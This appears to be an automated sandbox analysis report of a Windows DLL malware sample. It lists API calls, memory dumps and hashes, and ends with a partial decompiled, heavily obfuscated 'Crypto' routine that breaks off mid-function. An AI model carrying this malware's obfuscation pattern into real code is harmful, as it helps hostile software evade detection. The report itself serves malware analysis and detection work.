dllmain_raw.LIBCMT ref: 6EA9C9C8
dllmain_crt_dispatch.LIBCMT ref: 6EA9C9DF
dllmain_raw.LIBCMT ref: 6EA9CA27
dllmain_crt_dispatch.LIBCMT ref: 6EA9CA3A
dllmain_raw.LIBCMT ref: 6EA9CA4D

Memory Dump Source

Source File: 00000000.00000002.643198408.000000006EA81000.00000020.00020000.sdmp, Offset: 6EA80000, based on PE: true

Associated: 00000000.00000002.643166858.000000006EA80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643245244.000000006EAAA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643279187.000000006EADD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.643286673.000000006EADF000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.643293057.000000006EAE0000.00000002.00020000.sdmp Download File

Similarity

API ID: dllmain_raw$dllmain_crt_dispatch
String ID:
API String ID: 3136044242-0
Opcode ID: 40f801256b9357715a4f6888f223c8c8adcbcd5837b9d6a88ae534ee677d4b85
Instruction ID: 40c8e882faf92f74eabdf051d34a68f5af43db06ff9e34b333687a6c43c5f5d7
Opcode Fuzzy Hash: 40f801256b9357715a4f6888f223c8c8adcbcd5837b9d6a88ae534ee677d4b85
Instruction Fuzzy Hash: DE219172D20A25AFDB51CFA5C940EAF3AEEEB81B94F054515F8146E250D3308D81AB98

Uniqueness

Uniqueness Score: -1.00%

Function 6EA8C2A0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNELBASE(api-ms-win-core-synch-l1-2-0), ref: 6EA8C2A5
GetProcAddress.KERNEL32(00000000,WakeByAddressSingle), ref: 6EA8C2B5

Strings

WakeByAddressSingle, xrefs: 6EA8C2AF
api-ms-win-core-synch-l1-2-0, xrefs: 6EA8C2A0

Memory Dump Source

Source File: 00000000.00000002.643198408.000000006EA81000.00000020.00020000.sdmp, Offset: 6EA80000, based on PE: true

Associated: 00000000.00000002.643166858.000000006EA80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643245244.000000006EAAA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643279187.000000006EADD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.643286673.000000006EADF000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.643293057.000000006EAE0000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: WakeByAddressSingle$api-ms-win-core-synch-l1-2-0
API String ID: 1646373207-1731903895
Opcode ID: 2663977e28bf9037fe27c0cc5e950d6110235fc109cefd02bd3ac4003dba5848
Instruction ID: c01e2e19002edf07fc6be4b9e2abaf361726a9e0b98d77dc48736a3ecc2c3a8b
Opcode Fuzzy Hash: 2663977e28bf9037fe27c0cc5e950d6110235fc109cefd02bd3ac4003dba5848
Instruction Fuzzy Hash: 97B09BB0940B025FDED06AF5494C68A25D6B54125130144446511FD141F51484459D25

Uniqueness

Uniqueness Score: -1.00%

Function 6EA8C320, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNELBASE(api-ms-win-core-synch-l1-2-0), ref: 6EA8C325
GetProcAddress.KERNEL32(00000000,WaitOnAddress), ref: 6EA8C335

Strings

WaitOnAddress, xrefs: 6EA8C32F
api-ms-win-core-synch-l1-2-0, xrefs: 6EA8C320

Memory Dump Source

Source File: 00000000.00000002.643198408.000000006EA81000.00000020.00020000.sdmp, Offset: 6EA80000, based on PE: true

Associated: 00000000.00000002.643166858.000000006EA80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643245244.000000006EAAA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643279187.000000006EADD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.643286673.000000006EADF000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.643293057.000000006EAE0000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: WaitOnAddress$api-ms-win-core-synch-l1-2-0
API String ID: 1646373207-1891578837
Opcode ID: e2da66184c7fa75f8df1440b2c8407ba31e771203747d6e6f67d3c37141897a6
Instruction ID: 178b4225f203bd9310fe51098f903364e25aff6a206ccab47ad0c8315c2bf948
Opcode Fuzzy Hash: e2da66184c7fa75f8df1440b2c8407ba31e771203747d6e6f67d3c37141897a6
Instruction Fuzzy Hash: 13B092B0E00B026EDE90AAF5998CA8B299AB96135230285406016ED201EA24C4869D2A

Uniqueness

Uniqueness Score: -1.00%

Function 6EAA4161, Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 6EAA4169

Part of subcall function 6EAA4073: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,6EAA61E2,?,00000000,-00000008), ref: 6EAA411F

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6EAA41A1
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6EAA41C1

Memory Dump Source

Source File: 00000000.00000002.643198408.000000006EA81000.00000020.00020000.sdmp, Offset: 6EA80000, based on PE: true

Associated: 00000000.00000002.643166858.000000006EA80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643245244.000000006EAAA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643279187.000000006EADD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.643286673.000000006EADF000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.643293057.000000006EAE0000.00000002.00020000.sdmp Download File

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: f99e19f8abfc132c7a3ea0f781d39cdd0c3608e1c16e8ff7e60b937655c10244
Instruction ID: 90602fb5cfdba05b8720ad7f88f03446a59e77f27719cba5b8afa4ecac0abd23
Opcode Fuzzy Hash: f99e19f8abfc132c7a3ea0f781d39cdd0c3608e1c16e8ff7e60b937655c10244
Instruction Fuzzy Hash: 9111A1B1505B167E66021BFE5D89CAF7DADDE562993104826F601E7100EF648D8382B9

Uniqueness

Uniqueness Score: -1.00%

Function 6EA9C7D4, Relevance: 3.1, APIs: 2, Instructions: 76COMMON

Download Yara Rule

APIs

__RTC_Initialize.LIBCMT ref: 6EA9C821

Part of subcall function 6EA9CEAD: InitializeSListHead.KERNEL32(6EADE4A0,6EA9C82B,6EADAF60,00000010,6EA9C7BC,?,?,?,6EA9C9E4,?,00000001,?,?,00000001,?,6EADAFA8), ref: 6EA9CEB2

___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6EA9C88B

Memory Dump Source

Source File: 00000000.00000002.643198408.000000006EA81000.00000020.00020000.sdmp, Offset: 6EA80000, based on PE: true

Associated: 00000000.00000002.643166858.000000006EA80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643245244.000000006EAAA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643279187.000000006EADD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.643286673.000000006EADF000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.643293057.000000006EAE0000.00000002.00020000.sdmp Download File

Similarity

API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
String ID:
API String ID: 3231365870-0
Opcode ID: 217da8c906ba5633154341e646741d48c4ddf8f2afebe32fa6e31142f64995d8
Instruction ID: 3b4701f42c2bcbe0fdca144e4db7e9f01db1a6ea3c6ae8f35591296e392aa3ea
Opcode Fuzzy Hash: 217da8c906ba5633154341e646741d48c4ddf8f2afebe32fa6e31142f64995d8
Instruction Fuzzy Hash: 0121F3326A8B05AEDF416BF8C6047DC37E59F0A768F148C19D5412F2C1CB2A04C1FA6D

Uniqueness

Uniqueness Score: -1.00%

Function 00A70207, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 70stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNELBASE(000F59F5,00000000,?,?,?,?,?,?,?,9B842ACC,01B64447,00000000), ref: 00A702E1

Strings

(Gt, xrefs: 00A7025E

Memory Dump Source

Source File: 00000000.00000002.642951852.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true

Yara matches

Similarity

API ID: lstrcmpi
String ID: (Gt
API String ID: 1586166983-558867117
Opcode ID: bb735ff999d9414c3a9b564c67b10e962bbdffe1a82627d97bbaa383f4a39bdb
Instruction ID: ced07ad83efee7b25d40966b33871c4b2b3caa42291f592401fe317440bc11b7
Opcode Fuzzy Hash: bb735ff999d9414c3a9b564c67b10e962bbdffe1a82627d97bbaa383f4a39bdb
Instruction Fuzzy Hash: 5D2169B5D00208FBEF04DFA4CD0A9DEBBB2FB44314F10C599E515AA250D7B55A10DF90

Uniqueness

Uniqueness Score: -1.00%

Function 6EAA475C, Relevance: 3.1, APIs: 2, Instructions: 65COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 6EAA47A8
GetFileType.KERNELBASE(00000000), ref: 6EAA47BA

Memory Dump Source

Source File: 00000000.00000002.643198408.000000006EA81000.00000020.00020000.sdmp, Offset: 6EA80000, based on PE: true

Associated: 00000000.00000002.643166858.000000006EA80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643245244.000000006EAAA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643279187.000000006EADD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.643286673.000000006EADF000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.643293057.000000006EAE0000.00000002.00020000.sdmp Download File

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: 2c555e71abbe4efdf4e12024a23458051bb7e939798aa4ed80367dc85aad03b8
Instruction ID: 6b5b08e8eaa61f1b7ef5146a3ed7031dfc7a1d1ee12d9e29a9a66dc4188a13f3
Opcode Fuzzy Hash: 2c555e71abbe4efdf4e12024a23458051bb7e939798aa4ed80367dc85aad03b8
Instruction Fuzzy Hash: D711D671504BD24AC7708DBE8C94632BA95A747270B38072AF6B6D75F1CB30D8C7C649

Uniqueness

Uniqueness Score: -1.00%

Function 6EAA2C26, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,?,?,6EAA283F,00000001,00000364,?,FFFFFFFF,000000FF,?,?,6EA9CB0C,?,?,6EA9C074), ref: 6EAA2C67

Memory Dump Source

Source File: 00000000.00000002.643198408.000000006EA81000.00000020.00020000.sdmp, Offset: 6EA80000, based on PE: true

Associated: 00000000.00000002.643166858.000000006EA80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643245244.000000006EAAA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643279187.000000006EADD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.643286673.000000006EADF000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.643293057.000000006EAE0000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: a57031769bd76f47a1367ac68fbb031b66d8b7052abc892a30f96a5abdaa12ad
Instruction ID: 8c18cc4849c45387c532c47a9c29a5a9a6286288286a4adfb940e4935b0c1dda
Opcode Fuzzy Hash: a57031769bd76f47a1367ac68fbb031b66d8b7052abc892a30f96a5abdaa12ad
Instruction Fuzzy Hash: 6BF02432244B266AEB510EFF8904B9B7F999F41660B148412FA14BB184CB30D8E182BC

Uniqueness

Uniqueness Score: -1.00%

Function 6EAA22E9, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,6EA9CB0C,?,?,6EA9C074,00000400,FFFDC801,?,?,00000001), ref: 6EAA231B

Memory Dump Source

Source File: 00000000.00000002.643198408.000000006EA81000.00000020.00020000.sdmp, Offset: 6EA80000, based on PE: true

Associated: 00000000.00000002.643166858.000000006EA80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643245244.000000006EAAA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643279187.000000006EADD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.643286673.000000006EADF000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.643293057.000000006EAE0000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 039ac90fa84d6629da7ce0f4630832b441c6dba54f86ac9d46f75c01a35139a3
Instruction ID: 88d7005310526a67a18d2d4631de7c06678110e274ee7b7c5f9c42a7ef746df2
Opcode Fuzzy Hash: 039ac90fa84d6629da7ce0f4630832b441c6dba54f86ac9d46f75c01a35139a3
Instruction Fuzzy Hash: 5DE0E531101322ABEA521EEF8C007AB768DAF132A1F154121EF60AB180DB10CCE182BC

Uniqueness

Uniqueness Score: -1.00%

Function 6EA9F3B1, Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,6EAA1E1B,?,?,?,?,00000000,?,00000000,?,?,6EAA4EAE,?,6EAA4D3D,00000000,?), ref: 6EAA1C3F

Memory Dump Source

Source File: 00000000.00000002.643198408.000000006EA81000.00000020.00020000.sdmp, Offset: 6EA80000, based on PE: true

Associated: 00000000.00000002.643166858.000000006EA80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643245244.000000006EAAA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643279187.000000006EADD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.643286673.000000006EADF000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.643293057.000000006EAE0000.00000002.00020000.sdmp Download File

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 3049334c91bf52deddb2cc06b7938224b82a7424bcc109fc76cbeab898a24b05
Instruction ID: 5b7bfd8353de9319020282912fd7a84173a69c92cc0067ff760ef21d13b8835b
Opcode Fuzzy Hash: 3049334c91bf52deddb2cc06b7938224b82a7424bcc109fc76cbeab898a24b05
Instruction Fuzzy Hash: 73E048B538471731F9651FF84F167BA3A8D1B6571DF1408147718AE0C1EF4984D6802D

Uniqueness

Uniqueness Score: -1.00%

Function 6EAA1C23, Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,6EAA1E1B,?,?,?,?,00000000,?,00000000,?,?,6EAA4EAE,?,6EAA4D3D,00000000,?), ref: 6EAA1C3F

Memory Dump Source

Source File: 00000000.00000002.643198408.000000006EA81000.00000020.00020000.sdmp, Offset: 6EA80000, based on PE: true

Associated: 00000000.00000002.643166858.000000006EA80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643245244.000000006EAAA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643279187.000000006EADD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.643286673.000000006EADF000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.643293057.000000006EAE0000.00000002.00020000.sdmp Download File

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: b32ebea26a07d4cbdeebe8b8235877931ce638e45758d242836bdf217a230d07
Instruction ID: 6bc6cfcd0f851836cae05361cd5e15706d354257568aed2a9362b4a5919682d8
Opcode Fuzzy Hash: b32ebea26a07d4cbdeebe8b8235877931ce638e45758d242836bdf217a230d07
Instruction Fuzzy Hash: 2CE08CB038430A31F9651EE88E1ABBA3B890B61B1CF180418B718AE0C2DF8544D6802D

Uniqueness

Uniqueness Score: -1.00%

Function 6EAA228A, Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(?,?,6EAA0ED2,00000000,6EADB1B8,0000000C,6EAA0E99,?,?,6EAA2C59,?,?,6EAA283F,00000001,00000364,?), ref: 6EAA2299

Memory Dump Source

Source File: 00000000.00000002.643198408.000000006EA81000.00000020.00020000.sdmp, Offset: 6EA80000, based on PE: true

Associated: 00000000.00000002.643166858.000000006EA80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643245244.000000006EAAA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643279187.000000006EADD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.643286673.000000006EADF000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.643293057.000000006EAE0000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalEnterSection
String ID:
API String ID: 1904992153-0
Opcode ID: 2a3ce725cddd92ec150873dee8428c72621ca0fbd054a142d3160eed8e9fd446
Instruction ID: 908c21d0034e69fcfd844ed6faa3f2cf1321b27a09cae028699236c4112b9c25
Opcode Fuzzy Hash: 2a3ce725cddd92ec150873dee8428c72621ca0fbd054a142d3160eed8e9fd446
Instruction Fuzzy Hash: 0DB022B2800308A3CF00AA88CC0E88ABB8C80C0A223888020F00CCB020CA30E3A88288

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00A791F7, Relevance: 32.4, Strings: 25, Instructions: 1116
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00A791F7() {
				signed int _v8;
				char _v32;
				char _v40;
				signed int _v44;
				char _v52;
				signed int _v64;
				intOrPtr _v68;
				signed int _v72;
				signed int _v76;
				signed int _v88;
				char _v92;
				char _v100;
				char _v108;
				char _v112;
				char _v116;
				char _v120;
				char _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				unsigned int _v168;
				signed int _v172;
				unsigned int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				unsigned int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				unsigned int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				unsigned int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				signed int _v436;
				signed int _v440;
				signed int _v444;
				signed int _v448;
				signed int _v452;
				signed int _v456;
				signed int _v460;
				signed int _v464;
				unsigned int _v468;
				signed int _v472;
				unsigned int _v476;
				signed int _v480;
				signed int _v484;
				signed int _v488;
				signed int _v492;
				signed int _v496;
				signed int _v500;
				signed int _v504;
				signed int _v508;
				signed int _v512;
				signed int _v516;
				signed int _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _t1157;
				signed int _t1161;
				signed int _t1165;
				signed int _t1167;
				signed int _t1197;
				void* _t1204;
				signed int _t1240;
				signed int _t1242;
				signed int _t1243;
				signed int _t1244;
				signed int _t1245;
				signed int _t1246;
				signed int _t1247;
				signed int _t1248;
				signed int _t1249;
				signed int _t1250;
				signed int _t1251;
				signed int _t1252;
				signed int _t1253;
				signed int _t1254;
				signed int _t1255;
				signed int _t1256;
				signed int _t1257;
				signed int _t1258;
				signed int _t1259;
				signed int _t1260;
				signed int _t1261;
				signed int _t1262;
				signed int _t1263;
				signed int _t1264;
				signed int _t1278;
				signed int _t1349;
				signed int _t1350;
				signed int _t1353;
				signed int _t1369;
				signed int _t1381;
				void* _t1383;
				void* _t1388;
				void* _t1389;
				void* _t1390;

				_t1383 = (_t1381 & 0xfffffff8) - 0x250;
				_v132 = 0x2e436f;
				_v132 = _v132 | 0xf460f017;
				_v132 = _v132 ^ 0xf46ef27d;
				_v196 = 0x7e1c2e;
				_v196 = _v196 ^ 0x6e4e5938;
				_v196 = _v196 ^ 0x6e304516;
				_v244 = 0x3317d;
				_v244 = _v244 >> 1;
				_v244 = _v244 ^ 0x000198be;
				_v544 = 0x71e6e4;
				_v544 = _v544 ^ 0x19d035bd;
				_v544 = _v544 ^ 0xde3e36e6;
				_v544 = _v544 ^ 0xd4549da3;
				_v544 = _v544 ^ 0x13ca6661;
				_v252 = 0x207f28;
				_v252 = _v252 ^ 0x96f23610;
				_v252 = _v252 ^ 0x96d56cb8;
				_v284 = 0xb4eb71;
				_v284 = _v284 | 0x642f1f72;
				_v284 = _v284 ^ 0x64bf3882;
				_v300 = 0x36db85;
				_v300 = _v300 | 0x0bc6f940;
				_v300 = _v300 + 0x9fae;
				_v300 = _v300 ^ 0x0bfad767;
				_v208 = 0xa45bd2;
				_v208 = _v208 << 8;
				_v208 = _v208 ^ 0xa452a46b;
				_v336 = 0x6cd8ed;
				_v336 = _v336 * 0x36;
				_t1353 = 0xaa07b46;
				_t1349 = 0x36;
				_v336 = _v336 / _t1349;
				_v336 = _v336 ^ 0x006d1188;
				_v524 = 0xd565be;
				_t1242 = 0x7c;
				_v524 = _v524 / _t1242;
				_v524 = _v524 + 0xd960;
				_v524 = _v524 << 5;
				_v524 = _v524 ^ 0x00539a7f;
				_v528 = 0xe16fa2;
				_v528 = _v528 << 3;
				_v528 = _v528 + 0x4317;
				_v528 = _v528 + 0x3040;
				_v528 = _v528 ^ 0x0704c1ec;
				_v372 = 0x8fac1c;
				_v372 = _v372 ^ 0x1e276069;
				_v372 = _v372 * 0x3f;
				_v372 = _v372 ^ 0x8b8c4a83;
				_v272 = 0x48fc0a;
				_v272 = _v272 << 4;
				_v272 = _v272 ^ 0x048c9edd;
				_v516 = 0x93770a;
				_v516 = _v516 >> 9;
				_v516 = _v516 | 0x4252a838;
				_v516 = _v516 + 0x705d;
				_v516 = _v516 ^ 0x4251f9f6;
				_v512 = 0x41b3f;
				_v512 = _v512 >> 7;
				_v512 = _v512 | 0x35af6ec2;
				_v512 = _v512 * 0x53;
				_v512 = _v512 ^ 0x67eb8694;
				_v212 = 0xb915;
				_v212 = _v212 ^ 0x948b0e88;
				_v212 = _v212 ^ 0x9486ad8a;
				_v356 = 0x63bb5f;
				_v356 = _v356 ^ 0x436200ea;
				_t1243 = 0x7e;
				_v356 = _v356 * 0x76;
				_v356 = _v356 ^ 0xe2c785b3;
				_v324 = 0x6c06d7;
				_v324 = _v324 >> 0xa;
				_v324 = _v324 / _t1243;
				_v324 = _v324 ^ 0x000b64e8;
				_v308 = 0xca3f81;
				_v308 = _v308 >> 2;
				_v308 = _v308 >> 0xc;
				_v308 = _v308 ^ 0x00092fdc;
				_v360 = 0xbfd72b;
				_v360 = _v360 ^ 0xff3a0c39;
				_v360 = _v360 << 9;
				_v360 = _v360 ^ 0x0bb3b832;
				_v240 = 0x9d6f80;
				_v240 = _v240 / _t1349;
				_v240 = _v240 ^ 0x000c7437;
				_v588 = 0x113401;
				_t1244 = 0x61;
				_v588 = _v588 * 0x24;
				_v588 = _v588 / _t1244;
				_v588 = _v588 ^ 0x0003e589;
				_v384 = 0x4b8860;
				_v384 = _v384 << 0xf;
				_v384 = _v384 << 1;
				_v384 = _v384 ^ 0x8868048a;
				_v264 = 0x29020a;
				_t1245 = 0x11;
				_v264 = _v264 * 0x21;
				_v264 = _v264 ^ 0x0542f97f;
				_v468 = 0xb6b72b;
				_v468 = _v468 + 0xffff5632;
				_v468 = _v468 >> 0xb;
				_v468 = _v468 + 0x2f7e;
				_v468 = _v468 ^ 0x00028262;
				_v460 = 0x54f239;
				_v460 = _v460 << 6;
				_v460 = _v460 + 0xfffffbb9;
				_v460 = _v460 ^ 0x82d4ff03;
				_v460 = _v460 ^ 0x97e5d5b5;
				_v140 = 0x985261;
				_v140 = _v140 + 0xffff0c59;
				_v140 = _v140 ^ 0x00972a82;
				_v500 = 0x518a2c;
				_v500 = _v500 / _t1245;
				_v500 = _v500 + 0x702a;
				_v500 = _v500 << 0xd;
				_v500 = _v500 ^ 0xa785771e;
				_v368 = 0x521baf;
				_v368 = _v368 * 0x25;
				_v368 = _v368 | 0x64d0e33c;
				_v368 = _v368 ^ 0x6fdd3e6d;
				_v436 = 0x35d7cb;
				_v436 = _v436 * 0x6d;
				_v436 = _v436 | 0xabb542e6;
				_v436 = _v436 + 0xd249;
				_v436 = _v436 ^ 0xbff7fb1b;
				_v292 = 0xcdcade;
				_v292 = _v292 | 0x43b684fa;
				_v292 = _v292 ^ 0x43f66b05;
				_v160 = 0x58e408;
				_v160 = _v160 | 0x368c4477;
				_v160 = _v160 ^ 0x36d34ac8;
				_v304 = 0x7c84d1;
				_t1246 = 0x47;
				_v304 = _v304 / _t1246;
				_v304 = _v304 + 0xffff9796;
				_v304 = _v304 ^ 0x000bb16e;
				_v216 = 0xc36bed;
				_v216 = _v216 + 0xd97;
				_v216 = _v216 ^ 0x00c2e969;
				_v476 = 0xa7b7c7;
				_v476 = _v476 << 6;
				_v476 = _v476 + 0x6c6c;
				_v476 = _v476 >> 5;
				_v476 = _v476 ^ 0x0140bd2d;
				_v520 = 0xf3ea92;
				_v520 = _v520 + 0xffff847d;
				_t1247 = 0x3c;
				_v520 = _v520 * 0x69;
				_v520 = _v520 / _t1247;
				_v520 = _v520 ^ 0x01a2bdb3;
				_v440 = 0x637ee1;
				_v440 = _v440 + 0xffff9b2b;
				_v440 = _v440 ^ 0xed5600a5;
				_v440 = _v440 + 0xbbcd;
				_v440 = _v440 ^ 0xed38855c;
				_v316 = 0xd359ff;
				_t1248 = 0x12;
				_v316 = _v316 / _t1248;
				_t1249 = 0x2c;
				_v316 = _v316 / _t1249;
				_v316 = _v316 ^ 0x000bd707;
				_v404 = 0xe9d10;
				_v404 = _v404 + 0x8531;
				_v404 = _v404 << 7;
				_v404 = _v404 ^ 0x0799698e;
				_v568 = 0x4b0a43;
				_t313 =  &_v568; // 0x4b0a43
				_t1250 = 0x2f;
				_v568 =  *_t313 * 0x38;
				_v568 = _v568 + 0xffffdc5e;
				_v568 = _v568 ^ 0x149a11d4;
				_v568 = _v568 ^ 0x04f7f7c0;
				_v268 = 0xc0e06b;
				_v268 = _v268 / _t1250;
				_v268 = _v268 ^ 0x000b86b0;
				_v496 = 0xf422ea;
				_v496 = _v496 + 0xfffff2eb;
				_v496 = _v496 >> 7;
				_v496 = _v496 + 0xa1f8;
				_v496 = _v496 ^ 0x0008b42f;
				_v188 = 0x553f6c;
				_v188 = _v188 | 0x678376e9;
				_v188 = _v188 ^ 0x67d882bd;
				_v396 = 0x923886;
				_t1251 = 5;
				_v396 = _v396 / _t1251;
				_v396 = _v396 + 0x9c46;
				_v396 = _v396 ^ 0x00120a3e;
				_v560 = 0x9fec96;
				_v560 = _v560 | 0x622a8444;
				_v560 = _v560 ^ 0x99c5ba67;
				_v560 = _v560 >> 0xd;
				_v560 = _v560 ^ 0x0000fc9d;
				_v128 = 0xf88125;
				_v128 = _v128 << 0x10;
				_v128 = _v128 ^ 0x812bf008;
				_v552 = 0xcb4f6a;
				_v552 = _v552 / _t1349;
				_v552 = _v552 + 0xffff6d2e;
				_v552 = _v552 | 0x89619965;
				_v552 = _v552 ^ 0x8962c3cc;
				_v432 = 0xf978ba;
				_v432 = _v432 + 0xffffa816;
				_v432 = _v432 ^ 0x2094ddcc;
				_v432 = _v432 >> 0xa;
				_v432 = _v432 ^ 0x0007c0c7;
				_v488 = 0xcf9f95;
				_v488 = _v488 ^ 0xbf36e5e7;
				_t1252 = 0x58;
				_v488 = _v488 * 0x2a;
				_v488 = _v488 + 0xffff2176;
				_v488 = _v488 ^ 0x7ee684ba;
				_v388 = 0x12fb7d;
				_v388 = _v388 * 0x4d;
				_v388 = _v388 >> 3;
				_v388 = _v388 ^ 0x00bf9b98;
				_v340 = 0x796913;
				_v340 = _v340 + 0xac69;
				_v340 = _v340 * 0x61;
				_v340 = _v340 ^ 0x2e401a56;
				_v328 = 0x91b64e;
				_v328 = _v328 / _t1252;
				_v328 = _v328 ^ 0x35ed1920;
				_v328 = _v328 ^ 0x35e14498;
				_v320 = 0xcfff90;
				_v320 = _v320 + 0x6092;
				_v320 = _v320 + 0xffff7281;
				_v320 = _v320 ^ 0x00c5b6f7;
				_v452 = 0xef9f32;
				_v452 = _v452 | 0xbd38e664;
				_v452 = _v452 + 0xf2b8;
				_v452 = _v452 | 0x10bd091b;
				_v452 = _v452 ^ 0xbeb9595a;
				_v192 = 0x21f349;
				_t1253 = 0x54;
				_v192 = _v192 / _t1253;
				_v192 = _v192 ^ 0x000688f1;
				_v200 = 0xc0b775;
				_v200 = _v200 << 0xb;
				_v200 = _v200 ^ 0x05bf80fb;
				_v376 = 0x690522;
				_v376 = _v376 + 0xffffeeed;
				_v376 = _v376 ^ 0x86395638;
				_v376 = _v376 ^ 0x865332bb;
				_v248 = 0x6656fd;
				_v248 = _v248 | 0x17cebcd9;
				_v248 = _v248 ^ 0x17e231ad;
				_v256 = 0x5a882f;
				_v256 = _v256 + 0xffff43e8;
				_v256 = _v256 ^ 0x005beeea;
